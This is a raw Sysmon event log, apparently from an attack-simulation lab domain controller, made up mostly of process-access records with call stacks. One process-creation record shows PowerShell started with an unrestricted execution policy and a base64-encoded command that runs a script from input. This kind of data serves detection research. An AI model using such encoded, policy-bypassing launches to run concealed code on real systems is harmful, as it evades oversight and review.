10341000x8000000000000000353Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.982{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000352Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.982{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000351Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.982{D28789B6-7AC1-5FA1-0500-000000008701}636652C:\Windows\system32\csrss.exe{D28789B6-7C3E-5FA1-0403-000000008701}5012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000350Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.982{D28789B6-7C3E-5FA1-0303-000000008701}50164224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C3E-5FA1-0403-000000008701}5012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+90e532a9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+902f4133(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+902f3e04(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+90da5469(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+902b499a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+90312e69(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+902f64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+902f64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+902f635f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+902e82e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+902f4817(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+902f440a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+902f4133(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+902f3e04(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+90da5469(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+902dac65(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+902da235(wow64) 154100x8000000000000000349Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.984{D28789B6-7C3E-5FA1-0403-000000008701}5012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7C3E-5FA1-38EB-100000000000}0x10eb380HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7C3E-5FA1-0303-000000008701}5016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x8000000000000000348Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.904{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7C3E-5FA1-0303-000000008701}5016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000347Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.904{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7C3E-5FA1-0303-000000008701}5016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000346Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.872{D28789B6-7C3E-5FA1-0303-000000008701}5016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_qwqmjfcp.5t0.ps12020-11-03 15:50:22.872 10341000x8000000000000000345Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.857{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3E-5FA1-0303-000000008701}5016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000344Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.825{D28789B6-7C3E-5FA1-0103-000000008701}49881680C:\Windows\system32\conhost.exe{D28789B6-7C3E-5FA1-0303-000000008701}5016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000343Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.825{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000342Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.825{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000341Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.825{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000340Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.825{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000339Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.825{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000338Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.825{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000337Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.825{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000336Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.825{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000335Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 